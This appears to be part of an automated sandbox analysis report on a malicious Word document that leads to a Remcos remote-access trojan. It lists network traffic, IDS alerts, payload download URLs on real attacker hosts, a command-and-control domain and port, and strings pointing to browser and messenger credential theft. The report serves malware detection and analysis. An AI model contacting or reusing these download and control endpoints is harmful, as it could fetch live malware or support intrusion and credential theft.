                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 45.90.89.98:6845
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.90.89.98:6845
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 91.134.96.177:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 91.134.96.177:80 -> 192.168.2.22:49173
                  Source: Malware configuration extractorURLs: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 45.90.89.98:6845
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/WRRDFC.txt HTTP/1.1Host: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 104.21.78.54 104.21.78.54
                  Source: Joe Sandbox ViewIP Address: 45.90.89.98 45.90.89.98
                  Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /S7UYq0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.134.96.177Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45F76B39-3F2D-4D73-BB74-BCD50721118A}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /S7UYq0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/WRRDFC.txt HTTP/1.1Host: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhv77DF.tmp.15.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.420622955.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv77DF.tmp.15.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: og1.in
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:00:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biWt27U30cDbQpHFYU2uuX7KFKq1aQXK0JV7jWQVWugl4vE17EeCyrZWCf98lk5ypubXlkeoBwI1uZ%2BirEVtURtXaly76oO6n0wcra0ELNjBhrodR6SMQFA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cb464e7d85c1889-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:00:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uCpAmTZTgdeE0h3Su7CD8bdAY611yohjIEWh0aSjSEG%2FW%2FFxEjQndT06%2FwHwrwECWTeT6je5mcMXFhgAcLom0%2Fu9aN2dSTFiJkC0cp9GXq3GLm3TQqaH0NQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cb464f01f018c9b-EWR
                  Source: powershell.exe, 0000000C.00000002.411890930.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177
                  Source: powershell.exe, 0000000C.00000002.411890930.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/WRRDFC.txt
                  Source: EQNEDT32.EXE, 00000008.00000002.392960157.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIF
                  Source: EQNEDT32.EXE, 00000008.00000002.392960157.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFj
                  Source: uc on 91.134.96.177.url.0.drString found in binary or memory: http://91.134.96.177/80/uc/
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 0000000C.00000002.416176232.0000000005041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.924048781.0000000000755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 0000000C.00000002.411890930.00000000029F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: powershell.exe, 0000000C.00000002.411601940.000000000016A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv77DF.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
